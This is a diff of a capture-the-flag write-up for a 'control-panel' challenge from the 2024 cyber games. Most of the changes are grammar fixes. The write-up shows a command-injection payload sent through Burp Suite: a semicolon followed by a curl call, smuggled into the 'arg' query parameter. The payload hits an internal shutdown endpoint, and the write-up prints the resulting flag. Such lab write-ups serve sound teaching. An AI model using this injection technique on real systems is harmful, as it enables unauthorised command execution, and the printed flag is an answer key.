bsdtrhodes/2024cybergames/control-panel.md

                                 return
                         self.send_error(404, '404 not found')

-Hats off to everyone who tried placing no-flag-4-u into the answer in hopes it was that simple.
-So, we need to call "/shutdown" in this file, from destroy_humans.sh, to dump data from the url at localhost.
+Hats off to everyone who tried placing no-flag-4-u into the answer, hoping it was that simple.
+So, we need to call "/shutdown" in this file, from destroy_humans.sh, to dump data from the URL at localhost.
 To paint a more vivid picture, at the bottom of this destroyer.py file, you see it is what serves destroy_humans.sh:

         httpd = _TCPServer(host_port, CustomHandler)
         httpd.serve_forever()
 http_server(('127.0.0.1',3000))

-So we just need to call that, so how do we do that?
+So we just need to call that.
+How do we do that?
 Burpsuite allows us to modify in-flight requests.
-With intercept on, and http encoding, I modified the "GET /?command=destroy_humans HTTP/1.1" to be:
+With intercept on and http encoding, I modified the "GET /?command=destroy_humans HTTP/1.1" to be:
 GET /?command=destroy_humans&arg=check_status HTTP/1.1
-And I seen a status!
+And I saw a status!
 So, let's try to see if destroy_humans.sh will accept and run another command, a call to curl:
 GET /?command=destroy_humans&arg=%3B%20curl%20-s%20localhost:3000/shutdown
 Which produced:
 Destroy Humans option selected.
 Please choose 'check_status' or 'destroy_humans'. {"status": "shutting down..."}{"status": "SIVBGR{g00dby3_ARI4}"}